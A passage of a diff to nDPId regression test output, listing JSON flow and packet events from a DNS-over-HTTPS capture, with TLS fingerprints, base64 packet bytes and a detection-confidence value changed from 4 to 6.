{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2
DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} 
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcF
Ra4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} -01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq
1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJ
Pio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfp